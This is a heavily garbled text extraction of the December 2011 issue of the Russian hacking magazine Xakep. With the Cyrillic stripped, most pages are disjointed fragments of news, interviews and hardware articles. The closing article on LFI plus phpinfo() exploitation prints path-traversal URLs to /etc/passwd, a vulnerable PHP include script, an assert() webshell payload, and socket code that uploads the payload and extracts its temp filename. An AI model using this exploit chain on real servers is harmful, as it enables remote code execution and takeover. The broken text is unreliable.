Хакер 2011 12 PDF

030
x 12 (155) 2011
IPv6,

NAT'
WWW.XAKEP.RU
12 (155) 2011
LFI /TMP/ PHPINFO()
: 210 .
024
NGINX
102
++11:

074

FIREFOX
155

-

PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID
PR-
xakep.ru

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(naumkin@glc.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

.: (495) 935-7034, : (495) 545-0906
, ,
. ,
,
,
, , ,
.
, : ,
.
, . Eset , ,
. Group-IB
-.
, web- !
(),
: C
web-. ,
web- .
,
. , .
.
, !
. ,
,
.

TECHNOLOGY

(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
(birarova@glc.ru)
( )
(tatarenkova@glc.ru)
(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011
nikitozz, . .
vkontakte.ru/xakep_mag
facebook.com/XakepMagazine
12/155/ 2011
001
HEADER
COVERSTORY
004
020
016
017
018
MEGANEWS

,
hacker tweets
-
Proof-of-concept

024
030
036
PCZONE
042
046
050
Git&GitHub:
5

Clickjacking: , ,
IPv6:
IPv6- ?
054
060
064
068
074
078
082
Easy-Hack

!
demotivators.ru XSS

Firefox

: AdSense

X-Tools

097
102
106
110
088
094

PoC
114
120

OpenBSD 5.0 FreeBSD 9.0

kernel.org, linux.com,
inuxfoundation.org mysql.com
SYN/ACK
124
130
FERRUM
134
136
Quadratisch. Praktisch. Gut

GIGABYTE GA-H61N-USB3
,
Edifier MP250
137
Content
PHP
PHP-

C++11: C++

,
UNIXOID
MALWARE
084

, !
[ engine x ]

,

phpinfo
LFI-
PHP
140
144
8.5
FAQ UNITED
FAQ
+ Bluetooth = SMS
MEGANEWS
SONY

-
15

blekko. blekko
30
.
WP7

IOS ANDROID

Sony

100
PlayStation Network,

.
Sony
Music

8500 .
, ,
Sony. Sony
(,
GeoHot ),
,
. , ,
, 7 10
PlayStation Network, Sony Entertainment Network Sony Online
Entertainment. 60
PSN/SEN 33 SOE. ,
,
- .
.
Sony, 0,1 % .
93 ,
, .
, .
, Sony , . , . :)
MICROSOFT
SECURITY ESSENTIALS

PWS:Win32/Zbot Google
Chrome.
. ,
:).
004
,

. ,
121 .

,
,

. 9 % .

,
iOS Android . -

,
. Apple Google , ,
,
. ,
. , Microsoft
. ,
Windows Phone 7
,
Wi-Fi
,
.

.
Microsoft ,
, .
,
, WP 7.5.

.

Facebook.
ICQ MAIL.RU
Mail.ru
. ,
.
12 /155/ 2011
MEGANEWS
GOOGLE : Google Buzz, Google Labs, Google Code Search Jaiku.
EDIFIER
MICROSOFT -
Microsoft,
,
. ,
Waledac,
Rustock.
Microsoft Kelihos ( Hlux)
4245 .
Kelihos
- . , , DDoS-,
.
Microsoft . Microsoft ,
.
Kelihos 2011 ,
.
-, ,

.
sinkhole-
, . .
: . sinkholing

.
. Microsoft
, .
.

VeriSign.
, . ,
? , sinkholing
, -
. , ,
, , ,
.
Edifier
MP17

:
235 67 40 .
-

.
Edifier AudioCandy 2
(MP17) . . , USB- FM-,
, SD
,
( USB-). 17 .
2,4 RMS!
, . Edifier MP17
AUX.
,
FM-. 1300 . Edifier MP17
.
,
IPHONE 4S
.
, GPS .
, .
006
12 /155/ 2011
07
MEGANEWS
, DRM .
?
, !

Vigilant Defender.
Vigilant Defender , -
Deus Ex: Human Revolution .
, ,
. ,
, ,
.
. , , . , 24 %
, , 25 % ,
.
, ,
. , , ,
$3040 ( ,
Deus Ex: Human Revolution $60).
,
DRM .
eBay!

, ,
.
.
eBay
20. ,
(NATS). , .
,
. ,
,
.
,
.
.
NATS ,
,
. ,
.

-, .
WEXLER.BOOK E6002. WEXLER

WEXLER.BOOK E6002,
E6001. 6.0 PEARL,

.
4 , SD-
36 .
, .
-
1500 mAh, WEXLER.BOOK E6002

.
5 990 .
008

900

. Deus
Ex: Human Revolution

.
, PAYPAL
.
, . , . PayPal
,
,
2,4 3,4 % .

.
12 /155/ 2011
12 /155/ 2011
09
MEGANEWS
FACEBOOK . .
RIW-2011
,

:
RIW
-.

, . ,
ESET,
. ,
,
.

, ,
Group-IB .
2011
. , , , Digital Security.
-
,
.

, CEO- Hint Solutions.
-

WikiLeaks.
. ,
Positive Technologies
, -

.
RIW-2011.
,
, RIW 2011 .
,
.
- RIW-2011,
: . !
- RIW 2011,
:
, ,
,
,
,
,
.
HEADHANTER.RU IT-
71 %
-
, 18 %
, 8 % .
010
12 /155/ 2011
BUFFALO MINISTATION PLUS

1
7

Buffalo's Backup Utility

Windows. ,
Time Machine,

MAC OS X.
Buffalo MiniStation
Plus
1
.
,
.
USB
,
: ,
, .
:

USB.
RAMDISK
TurboPC
TurboCopy

USB 3.0

.
12 /155/ 2011
USB 3.0
Buffalo MiniStation Plus

eco
Manager,
.
:

.

AES
256 .

SecureLockMobile.
RAMDISK Buffalo

. ,
,

.

.
011
THE WALL STREET JOURNAL, Photobucket .
MEGANEWS

,

.
, , , . ,
Predator Reaper,
. , , , ,
.
, .

. ,
,
. , , . ,
,
- . , ,
,
- Mafia Wars :).

, 27 100 Chrome
.
50
50 .
012
Belgacom
Telenet
11 ,
The Pirate Bay.
3D-
,

3D- (

) .
. ,
,
. Roland DG, ,
3D- iModela
$977 ( 3D- ). ,
, , ,
, , ,
. . ,
, , ,
.
, , ,
.
RUNA CAPITAL 3
- NGINX,
. 43
.
LibreOffice

Apple
iOS Google Android.
12 /155/ 2011
() LTE.
C3PO-r2d2-POE
.

. :)
Chaos
Computer Club ()
. , ,
-. , , , ,
.

. ,
, , ,
.
,
,
. , CCC, ,
.
IE 9

-
, Microsoft.

92% URL-
8% .
12 /155/ 2011
PHOTOSHOP
deblurring

. !
:).

1,5%
78,5%,

.

, , .
,
,
. , ? ! .
20-
.
BSL ( 82 84 ) Lineage 2.
BSL, ,
. , ,
,
.
, , , .
,

.
,
, .
,
, . ,
. -, ,
- ...
FACEBOOK .

. ACE,
Webscense.
, ,
, .
013
MEGANEWS
9TO5MAC , IPAD 2 Smart Cover.
SPYEYE
DART
GOOGLE

SpyEye
SMS

,

.
Trusteer ,
SpyEye . ,
:
SMS ,
- . MitB-
, -,
, . ,
- , ,
. :
SpyEye
.
,
, .
,
, . ,

, SIM-.
, ,
.

GPS- . ,

5%- .
014
Google
,

Dart (dartlang.
org).
,
, -
. JavaScript. , Dart
JavaScript,
.
, , BSD. Dart
. ,
.
, Web Inspector
Dart Harmony -. ,
Dart ,

,
.
, Dart
JavaScript.
Dart
Dart. Google
Dart Chrome, ,
Google Chrome OS.
:
, .
,

.
,
.
. Dart
, , .
.
, Dart
Google. 2006 Google Web Toolkit, - Java.
, , Adwords Google Wave.
Google Web Toolkit .

Dart, Google...
Dart , , . Dart

, , Google
.
12 /155/ 2011
EUROPEAN ATM SECURITY TEAM , , , 33 %.

CHROME
GOOGLE
,

, Google ,

.
, , Chrome. , Chrome
Remote Desktop, -.
Windows, Mac OS Linux,
Chrome-. Chrome Remote Desktop
- Chrome.
IT-, , .
(
) .
- , .
Google , -,
, .
, Google hrome , -.
WebRTC (Real Time
Communications),
- . Google , WebRTC
-
, . ,
. , WebRTC
Opera Mozilla. ,
Google Mozilla Opera,

.
, WebRTC. Google
, Chrome.
, WebRTC ,
: iSAC iLBC
, Google
V8. chromium.org ,
PARKER INGENUITY

,

12 /155/ 2011
, Google eamViewer
P2P-
libjingle, UDP TCP
Google.
PseudoTcp libjingle,
. SSL-.
protobuf (Protocol Buffers).
PARKER 5TH TECHNOLOGY

PARKER
, .
Parker 5TH Technology ,

,
.

,
, ,

.

,

. Parker
Ingenuity
Parker 5TH Technology;
,

. Parker
Ingenuity :
, .
,

,

.
015
HEADER
,

?
, ,
,
. .
- -,
Loggly, Splunk - .
. ,
,
syslog/syslog-ng, . ,
-,
. -. -, . -,
. , , :
- - .
standalone- Loggly, ,
Graylog (www.graylog2.org/about),
,
MongoBD . ,
Logreplica (dklab.ru/
lib/dklab_logreplica). , .
?
: Logreplica
SSH ,
. , ,
,
, ,
.
.
. :
syslog/syslog-ng?, Logreplica
. ,
.
# ,
destination = /var/log/cluster
# ( )
skip_destination_prefixes = /var/log:/var/lib/pgsql/data/logs
#
scoreboard = /var/run/dklab_logreplica.scoreboard
delay = 0.25
#
user = root
# -,
#
[files]
/var/log/{messages,maillog}
/var/log/httpd/*_log
# ,
[hosts]
first=machine1.example.com
second=nobody@machine2.example.com
. - dklab_logreplica.
init /etc/init.d . /etc/init.d/dklab_logreplica start,
logreplica .
?

, (www.denwer.ru),
PHP ( logreplica
Perl). z
?
, -
(
).
-, .
, (
ssh-keygen -t rsa) ,
(ssh-copy-id root@machine-to-be-pulled). Logreplica
(/etc/dklab_logreplica.conf),
, -,
:
016
Logreplica GitHub
12 /155/ 2011
(@asintsov)
00000000
#hacker tweets
@FishermansEnemy:
@jmj:
CISSP,
Metasploit.
Facebook,

. .
@StackSmashing:
@DidierStevens:
free(pDennisRitchie);
pDennisRitchie = NULL; // :-(
-2147483647

Integer.
.
,
,
Lisp .
@XakepRU:

: live.
xakep.ru/blog/Hack/2147.html.
:
@0x6D6172696F:
.
.
bit.ly/rIbsue.
:
,
,

Chrome,
(
Google).
cross-origin policy!
, ,
, ;).
@yandex:

:
$5000
.
, web-
. ,

.
@stamparm:
Google
'"</title><script src" urchin.js'

, (!) ASP(.
NET)/MSSQL SQLi #fact
:
-. , , SQLi. ,

:).
@0xcharlie:
,
NMFB, ,
Syscan Infiltrate. ,
= .
:
NMFB NoMoreFreeBugs
. ,
.

.
@mikko:
, ,

IE6 F-Secure? :
W32/IE6.a, ...
@samikoivu:
2008

Java. Java,
.
@ConanOBrien:
,
, .
Angry Birds, Angry
Birds Rio Angry Birds Seasons.
@VUPEN:

. ,
, .
@BreakiingNews:
75%
: 1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 - ,
...
MS Windows 0-Day, Duqu TrueType. T2EMBED.DLL bit.ly/sqYUgo

:
@0xcharlie:
,
:
Secunia
.
... #nomorefreebugs
12 /155/ 2011
@BillGates:
, ,
.
.
, ... , StuxNet 0-day

...
- !
017
HEADER
Proof-of-Concept

,
.
,
.
PoC
.
, ,
Tcpcrypt (tcpcrypt.org), TCP
.
?
. Tcpcrypt
. ,
:
.

- ,
. Tcpcrypt TCP.

, .
.
Tcpcrypt,
, ,
.
?
(github.com/
sorbo/tcpcrypt), . ,

(Windows, Mac
OS X, Linux, FreeBSD).
:
(4500 ) userland (7000 LoC).

,
netsf.inf. , , Tcpcrypt.
nix-
: ,
tcpcrypt : -
, TCP
018
.
.
?
79%
Tcpcrypt :). ,
.
(Internet
Draft), ,
( : bit.
ly/tyvGxs). ,

,
?
( ,
NAT), ,
. ,
Tcpcrypt
- (
VPN-). , (
36 SSL).
, .
Tcpcrypt? ,

MITM-. z
SSL 82 TCP.
tcpcrypt TCP !
12 /155/ 2011
!
GROUP-IB,
,
.
GROUP-IB.
Group-IB
,
. ,
.
NUX
I
L

:

:

11
20
3
:

Group-IB . .

. .
2 2011

()

,
,

.

USB Flash,

,

dd (raw).
,

,
,
,
.

11
3 20
x.
nu
Li

1.

?
,
?

2.
?
?

:

?

,

?

?

?

.
.
contest@group-ib.ru

.
DVD
!
!
COVER STORY
, , Group-IB

, !
, DDoS,
,

-
.
,

. ,
.

,
,
,

.

,
,
, ,

.

, ,

.

()
. ,
,

,
.
,

, ,
. .
1)
, . , ,
. ,
020
, ,
.
2)
,
,
.

.
3)

. , DLP
. DLP-
.
.
4)
,
-. ,

.

.
,
, ,
.
1) , , , :
,
.
.

.

, ,
( , IPS,
DLP), ,

12 /155/ 2011

IP- 8.8.8.8,
,
1 25 2011

.
2241 19
2000 .

() . .
Caine - Computer Aided INvestigative Environment

.
-,
.
,
.

.
2) , , ,
:
, ,
, ,
,
.

,
.
,
.

.

Linux:
Caine (http://www.caine-live.net/),
RipLinux (http://rip.7bf.de/current/).
, CD\DVD
USB-, .
livecd ,

.
.

- , ,

. ( )
DC3DD. (
)
Access Data FTK Imager (http://
accessdata.com/support/adownloads),
. ,
,

.
-

( , ) ,
.
,
.

,
.
12 /155/ 2011

,
,
,

.

,

.
. ,

.
,
,
. ,
, :
, ;
021
COVER STORY
,
;
(, );
, .
:
,
. .,
12345.

(), DVD, USB-,
SDHC.
Seagate, 3750330NS,
AAABBB123.
\Users\\Documents\ 1 8

.txt.
QIP 2010,
6221, ,

.
, :
(, , );
(, );
;
,
.
, , Group-IB
,
:

\COMP1\HDD1\IE USB-, ADATA, 1234.
, :

;
, -,
- . ;
, ,

.
!
:
.doc,
653 .
MicroSDHC,
Transcend, 16 ,
1234 567.
-
Internet Explorer .

,

.

(, -),
, , ,
,
.
,
:
, DLP
, .

DLP, ,
.
.
.

, , .

,
,
,
.
RIP Linux
022
12 /155/ 2011
: DDOS
,
:
, -
- .
-.
- ,
.
-
(), ,
.

,
510
.
.

,
.
.
. ,
, .
,

, ,
:),
.
,
:
1)
.
2)
.
3) ,
. z

SONY , ,

12 /155/ 2011
Access Data FTK Imager
:
,
:
,
,
, , ( ).
.

.
( ),
, .

,
,
,
.
023
COVER
STORY
&&&&&
[engine x
024
12 /155/ 2011
nginx
, ,
,

?

. ,
( ) -,
18 . 1987
,
,
-,

.
-226,
- .

, -86,
,
.

:
, Yamaha
( MSX). , , I.
, - .

NGINX

,
?

AV,
19891990 .
,
- 100 .
,
,
: ,
, ,
. ,
.
,
. :
,
. -
, 1992-
, .
1994 ,
,
.
7 ,
2000 .
NASDAQ, -,

. -
XXL.RU, ,
,
13 2000

.
.
1994

, .
,

200 0
, .
11
2002
nginx,
web-
. 45

.
2011 $3.000.000
Nginx , inc. .
12 /155/ 2011
025
025
COVER STORY
Q
.

. ,
,
, ,
,
Apache. , mod_gzip
,
mod_deflate, Apache 1.3.
mod_proxy. ,
,
- .
mod_accel
Apache .
2001 .

,
?
, . Mod_deflate
,
, .
, , ,
. 2001

-, Apache.
,
, .

, , ,
, , .

Apache , .
:
Apache
, .
nginx Apache
. , ,
nginx .
Apache: ,
,
. ,
- ,
.
- , , :
, ?
nginx . ,
- 2002 nginx.

? ?
2003
, , , nginx
.
026
Rate.ee,
. , ,
. nginx
mamba.ru zvuki.ru,
MP3.
2004
foto.rambler.ru, , , nginx
,
.
, , ,
, , . ,
, . - 2004
, foto.rambler.ru
nginx.
4 2004 ,
, : 0.1.0.
NGINX
,
?

.
. nginx
. nginx
,
.
, , nginx,

, , .
,
.
.
,
, ,
?

. ,
.
, nginx
,
,
, . nginx, ,
. -,
,

, -,
.
, LIGHTTPD
, .
-,
nginx
. nginx

. ,
nginx
nginx. , nginx
-.
lighttpd (lighty). -
, nginx, .
(Jan Kneschke).
,
, , .
, ,
.
, lighttpd
FastCGI. 20002001
, , Apache: PHP, Perl, Python.
lighttpd
PHP- , FastCGI.
lighttpd FastCGI . 2000 :
, FastCGI?
mod_php, .
NGINX ?

. nginx
-
- HTTP FastCGI
WSGI.
Apache , nginx
,
FastCGI.
, ,
nginx, Apache.
:
nginx , .
,
?
, ,
Apache nginx? ,
, . Apache
,
- , ,
mod_php. ,
PHP 100
, ,
, 100 .
: 10
,
, -
.
100
, , 80 / (10 /).
, 10
. ,
12 /155/ 2011
nginx
, Apache PHP
1020 .
, , Apache
, ,
.
,
. nginx
Apache, :
nginx
, Apache,
,
.
nginx ,
- ,
,
(
Apache,

. . .).
- , ,
nginx

nginx
,
.
,
,
, - .
Apache, nginx
! .
, ,
, .
, -,
,
. , nginx
.

, , ,
. ?
, , :
- Apache . ,
nginx, Apache.

FastCGI PHP WSGI Python.
, WordPress.com nginx
, -
LiteSpeed.
nginx,
PHP FastCGI.
nginx ,
, MP3, FLV-, MPEG4-, .

.
NGINX -
?
12 /155/ 2011
, ,

, .
,
.
, ?
- ,
. ,
. ,
, ,
. ,
- Debian/Ubuntu,
,
, ,

. ?

, , .
ALSR?
, . .
, . , ,
, ,
, , .
nginx ,
, , .
, ,
. ,
, nginx ,
malloc.
, -
,
. nginx . ,
, . , ,
, .
Security-advisory ,
. ,
, . ,
, ,
? ,
- .

Q
, ?
, .

.
.

. :
, .
. .

,
. :

, -
,
, . , ,
,
. ,
, . :
nginx , ,
,
. ,
.
,
NGINX,
INC. ,
.
. , ,
2008-
, , .
,
. -
nginx, . ,
.
, -
,
,
. ,
,
nginx. ,
: ,
,
.
- . ,
, - ,
.

, Parallels Runa
Capital.
, .

, ?
,

, .

,
, ,
, .
, , ,
, , -,
,
, ,
- , . ,
, :
-, -. . ,
, .
027
027
COVER STORY
:
NGINX.
?
.
?
, . ,
, ,
.
,
,

.
, : .
, ,
BSD,
.
nginx ,
.
, nginx
, Rate.ee zvuki.ru.

NGINX?
A ,
. , .
,
, ,
, .
.
Linux-:
CentOS, Ubuntu.
, , .
: ,
, ,
.
.

.
,

,
.
,
, ,
, ,
. ,

.
,
, :).
,
,
, ?
028
, ,
, ,
, ,
: .
, ,
.
,
! , -
:
-
.
, , .
- ,
.
-, :
, , .
! ,

- -?

?
nginx
.
-, , ,

,
-, ,
-
. , nginx
, ,
.
, : , ,
. ,

.
opensource-,
,
- , - ,
, .
, opensource. ,
, . ,
,
.
,
.
,
. ,
opensource-
.
, , ,
, ,
,
nginx.
. ,
- : ,
! - -.
?
,
,
. . .
,
. , , ,
-
, - ,
.
, : ,
. ,
open source, ,
/ . sponsored development.
,
nginx: ,

, , , , CDN-.

.
, ,
, ?
, ,

.
,
, ,

.
, .
,
,
, .
,
,
, ,
?
, ,
, ,
,
- . ,

,
- .
,
. . z
12 /155/ 2011
nginx
- nginx,
. , ,
, -, .

nginx.
Nginx

.

HTTP keep-alive
.
-
(Netcraft, 2011):
-
nginx
100
000 000
80 000
000
43 000
000
-0.38%

,
nginx

-.
-0.07%
+0.51%
2002
2004
2011
1.0
nginx
2011 nginx

:
.
12 /155/ 2011
Rate.ee
,

nginx.
nginx
:
$3
nginx
87 912
.
70+

.
nginx hiring!
8
nginx
security advisories.
3
nginx
029
COVER STORY
R_T_T
,

.
,
. ,
,
,
.
030
12 /155/ 2011

,

Intel
( 2007 )

,

SMP-.
,
, ,
1. AMD
12 /155/ 2011
,
.
,
, .
,

. , ,

,
, .
, ,
.

,
.

.

( 4060 ),
- , ,
.

,

,
( , Intel
). .
, ,
, .
, , -
, .
,

,

.
,
,
.
,

, .
,

.
, ,
- .
,

, , .
,
Intel

.
-
031
031
COVER STORY
86.
,

,

.

.
, - , , - .
,
,
- .
,
.
,

, ( )
.
, , ,
.
, ,
,
Intel
,
:
, , -
,
,
Intel. , -
? : Assembled
Canada, Assembled China.
, -
2. Intel
032
,
,
. , ,
, ,

.
:

, .
,
, , ,
, .
, Intel
. ,
5000, . ,
631xESB/632xESB I/O Controller Hub,
- , 2007

. ,
. ,

-:
,
,

.
()
.
, - ,

.
, , , -
, , ,

, : , .
Intel ,
,
( IPMI,
)
,
.
, - ,

, .
.
,
:
ARC4 processor working at 62.5 MHz speed.
Interface to both LAN ports of Intel
631xESB/632xESB I/O Controller Hub allowing
direct connection to the net and access to all LAN
registers.
Cryptographic module, supporting AES and
RC4 encryption algorithms and SHA1 and MD5
authentication algorithms.
Secured mechanism for loadable Regulated FW.

40
, ! Intel
256 .
,
,
.
,
Intel, 5000,
. , , ,
(
,
).
,
, -
,

,
.

, ,
-
, .
,

.
12 /155/ 2011

, Intel

,

.

.
:
Intel
5000 , - ,

.
-
Intel ,
,
.
- ,
-
, , , , ,

.
-

Intel,
, . ,
.
, ,
, ,
.

,
?
,

. ,

,

60 , .
, , ,

, . , ,
,
- IP-.
? , -
,

, -
12 /155/ 2011
.3
.
, ,
, ,
,
.

.
Intel AMD ,
, ,
. ,
, .
.

,
,

.
,
.

VMCB (VMCS), ,
0,40,7 .

Intel ,

,
.
.
Intel AMD
.

. AMD , .

AMD
VMRUN ( , ).
VMCB- AMD
,

VMRUN VMCB- .
,
AMD .
Intel
. VMCB- VMREAD VMLOAD,
.
,
VMCB-,
.
, , .
,
,
. , ,
. Intel
, , ,

VMCB (. 2).
,
SMM- ( ),
, , VMB-,
,
,
,
.

, Intel, ,
, ,
. ,
,

.
: , -
.
033
033
COVER STORY

,

. .
,
. , -
.
,

,

. , : ,

.
,
.
, Intel
.
,
, 7,
11- ,

( - ). , 11

, VMCB-
.

,
.
11-
,
,
, .

, ,
-
.
, , , 11-
.
,
!
, -
,

,
.
, . , ,
,
-
.

- , ,
.
,

.
, ,

Intel, , ,
, .
- .
, . , ,
.

-,
.

, .

. ,
, , .
,
.

USB-, ,
,
.

(. 3).
, ,
,
.

(. . 4).
- ,
Intel, ,
.
. Intel. ,

.
,
, .

.
. , ,
Intel , .
, ,

.
, ,
.
. 4.
034
03
0
3
34
12
2 /155/
/1
155
15
155/
55/
5
5/ 20
2
201
2011
01
0
11
.
,
.

, .
, , ,

,
. ,
,
,
.
,
, ,
.
, ,
. ,
. .
,

, .

, ,
, ,
,
.
, , ,
,
.
,
,
. ,
,
.
,
. ,
,
.
, , ,
, ,
.
,
-
, ,
-?
,

?
12
12 //155/
155// 201
155/
155
15
2
20
2011
01
0
11
,
, .

, .

,
( , ). ,
,
, ,
. 86, , ,
. , ,

, .
, ,
.
.
,
:
. - ,
.

-, -,
,
.

,
. ,
,
.
-
,
. ,

,
, , ,

,

, .

, ,
.
, : /
.
/
.
!
20

.
:
.

DOC-
.
,

,
.
,
( ,
) .
. ,
,
,

.
,
.

.

.

,
, .
, ,
. , ,
, .
,
, , .
, ,

.
, ,
, -

. ?
. ,
. ,
, , ,
, .
,

.

,
.
, , ,
. ,
, -. , , , , ,
.
, . ,
, , , ,
, . z
035
35
5
000, 00spersky Lab

poma (pomawke@gmail.com)
COVER STORY
phpinfo
LFI-
PHP

LFI
phpinfo()
.
.
WWW
php.net

PHP;
bit.ly/neygaA
LFI;
bit.ly/ccFHcY
phpinfo() ;
bit.ly/pmkMVP
LFI phpinfo()
RDot;
bit.ly/YP9LE
BWMeter;
bit.ly/eS4GxW
Procmon.
WARNING

. ,

,

036
INFO
DVD
phpinfo()

10% .

PERL PHP,

.
, ,
local file include, ,
. . , .
,
, . LFI,
.
. -: , - local file inclusion...
php.ini - , ?
, - , ! LFI- ,
,
.

LFI:
1. (, , . .).
(,
).
2. (/apache/logs/error.log, /var/log/access_log, /proc/
self/environ, /proc/self/cmdline, /proc/self/fd/X ).
, ,
. PHP CGI
/proc, .
3. (data:, php://input, php://filter),
allow_url_include=On ( Off) PHP >= 5.2.
4. (/tmp/sess_*, /var/lib/php/session/). ,
.
5. . CMS www-,
( , /var/spool/
mail).
12 /155/ 2011
phpinfo
tmp-
, LFI
(/tmp/php*, C:\tmp\php*). /
:
LFI-;
phpinfo();
- Windows (
);
PHP > 5.2.0.

( , - ,
):
1. PHP- php- phpinfo(), PHP (tmp) .
2. phpinfo()
seed ( ) .
3.
(, Content-Length),
.
4. tmp- LFI.
PHP- tmp-
PHPINFO()
phpinfo().
, php.ini
, .
:
1. upload_tmp_dir , PHP . (NULL),
Environment.TEMP.
2. file_uploads
upload_tmp_dir (
On).
3. upload_max_filesize .
(
10 ), 2 .
4. max_execution_time .
0, ,
, . :-)
5. session.serialize_handler . php
( ).
, phpinfo()
PHP, PHP Version 5.3.8.
PHP $_FILES

. . , :
(
RFC1867):
1. .
2. - PHP.
3. PHP tmp- .
4. .
6. PHP- .
7. PHP -.
8. PHP cleanup ( ) .
9. - , .
http://site.com/css.php?file=style.css
http://site.com/css.php?file=../../(..)/etc/passwd
, css.php:
<?php
// {..} - ,
// {..}
if (!isset($_GET['file']) OR
!file_exists('./tpl/default/'.$_GET['file']))
die('404 Not Found');
// {..} , -
//
include './tpl/default/'.$_GET['file'];
?>
, ,
,
. *nix Windows:
http://site.com/css.php?file=../../../../../etc/passwd
http://site.com/css.php?file=../../../../../tmp/
http://site.com/css.php?file=../../../../..\Windows\Temp\
12 /155/ 2011
3, 4, 5, 6, 7 tmp- ,
8 . PHP-

$_FILES,
move_uploaded_file(). ,
PHP
, ,
. , PHP
, cleanup.
, ,
, ,
. ,
PHP- ( ob_* ob_start, ob_flush ), , 8 9,
.
037
COVER STORY
DOS LFI + PHPINFO()
_FILES, ,
. .
, - ?
? .
. ,

30
, ,
. ,
.
(
+ ).

. ,
. .
DoS-
file_upload php.ini.
,
. phpinfo(),
tmp- , ,
LFI , PHP cleanup.
, , .
, PHP ?
PHP
,
LFI , PHP. PHP
! , . , . , , .
, . :) :
Content-Length (
);
(,
------------8WvJNM).
, :
1. .
2. ( ).
3. ,
.
2 ,
PHP . , , ,
, ,
.
TMP-
,
.
phpinfo() .
(phpinfo.php, info.php, i.php . .), Grey eLwaux
( ). ,
. . PHP Variables phpinfo()
038

PHPINFO()
PHP- phpinfo()
, .
,
.
, ,
phpinfo():
1. , / PHP, ;
2. document_root ,
;
3. error_log ( LFI);
4. safe_mode (default OFF) ;
5. open_basedir (default empty) ,
PHP;
6. allow_url_fopen (default ON) URL
;
7. allow_url_include (default OFF) ;
8. magic_quotes_gpc (default OFF)
;
9. register_globals (default OFF) ;
10. disable_functions (default empty)
;
11. max_execution_time (default 0)
;
12. display_errors (default OFF) ;
13. upload_tmp_dir tmp-.
14. (curl, sockets, zip . .);
15. : _GET, _POST, _COOKIE,
_FILES, _SERVER.
: _GET, _POST _FILES. PHP (<=5.1) phpinfo()

_FILES,
Array. ()
.
, phpinfo() ,
HTML-,
PHP Variables:
<form action="http://site.com/phpinfo.php"
enctype="multipart/form-data" method="POST">
<input type="file" name="aa" />
<input type="submit" />
</form>

GET- : http://site.com/
phpinfo.php?a[]=111. PHP _FILES _GET ( ,
var_dump). , ,
tmp-. tmp-
upload_tmp_dir php.ini. *nix /tmp, C:\Windows\Temp. 99 % PHP
. (bit.ly/
raWpwS), Windows , PHP
GetTempFileName,
:
12 /155/ 2011
phpinfo
(!) .
<path>\<pre><uuuu>.TMP
--<path> = C:\Windows\Temp ( upload_tmp_dir
php.ini),
<pre> = php (session.serialize_handler),
<uuuu> = .
, Windows <uuuu>
, :
php1A3E.tmp
php1A3F.tmp
php1A40.tmp
*nix
mkstemp (linux.die.net/man/3/mkstemp):
<path>/<pre><rand>
<path> = /tmp,
<pre> = php (session.serialize_handler),
<rand> = (seed += XXX ^ PID)
XXX glibc
:
- XXX = time()
- XXX = gettimeofday().sec << 32 | gettimeofday().usec
- XXX = rdtsc
, ,
: /tmp/phpXXXXXX, XXXXXX
[A-Za-z0-9]:
/tmp/php6Dekf9
/tmp/phpK1uuk5
/tmp/phpdnJ82P
, *nix Windows
. , -
WINDOWS
,
:
1. phpinfo().
2. , phpinfo()
_FILES[tmp_name] .
3. phpinfo()
<?php
assert(stripslashes($_REQUEST["e"]));
?>
, Content-Length
. .
4. ,
, (. 1) (
LFI).
5. tmp-, .
6. 2- , .
, phpinfo() win-
. phpinfo() ,
. Windows 61440 .

*nix- :
1. phpinfo() HTTP- c PHP-
.
2. -
- (, BWMeter),
.
3. , phpinfo().
4. ! [tmp_name] - ( ,
), /
.
phpinfo() - ,
,
.
phpinfo.php
, ,
,
:
http://site.com/css.php?file=../../htdocs/public_html/
phpinfo.php
PHP,
12 /155/ 2011
URL POST- , PHP-
039
COVER STORY
, . ,
, , PHP-.
, phpinfo() ,
.
1000000*36 ,
.
. ,
Microsoft-IIS/7.5 PHP/5.3.8.
Windows- css.php LFI:
<?php
$file = './uploads/'.$_GET['f'];
if ( file_exists($file) ) {include $file; die; }
die('File not found!');
?>

phpinfo.php:
<?php
phpinfo();
?>
, tmp-:
<?php
assert(stripslashes($_REQUEST["e"]));
?>
PHP- POST-
PHP-:
// Evil
$file="-----------------------------XaXbXaXbXaXbXa\r\n";
$file.="Content-Disposition: form-data; name=file".rand(0,100).";
filename=\r\nfile".rand(0,100).".txt\r\n";
$file.="Content-Type: text/plain\r\n\r\n";
$file.="<?php assert(stripslashes(\$_REQUEST[\"e\"]));?>\r\n";
$file.="-----------------------------XaXbXaXbXaXbXa\r\n";
$post = $file;
$req ="POST ".$target." HTTP/1.0\r\n";
$req.="Host: ".$host."\r\n";
$req.="Content-Type: multipart/form-data;
boundary=---------------------------XaXbXaXbXaXbXa\r\n";
$req.="Content-Length: ".strlen($post)."\r\n";
$req.="Connection: Close\r\n\r\n";
$req.= $post;
:
$tmp = '';
$html = '';
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, 80);
socket_write($sock, $req);
while ($out = socket_read($sock, 65536))
{
$html .= $out;
if(preg_match_all('#=>(.*)#',$html,$r) &&
!empty($r[0][2]))
{
040
$tmp = str_replace(array("=>",' '), '', $r[0][2]);

}
}
socket_close($sock);
$html phpinfo, $tmp

tmp-. <uuuu>:
$tmp_hex = $tmp;
if(strpos($tmp_hex,':')) {
$path = explode(':',$tmp_hex);
$tmp_hex = $path[1]; }
$tmp_hex = ($tmp_hex &&
preg_match('#php(.*)\.tmp#',$tmp_hex,$rd)) ? $rd[1] : '';
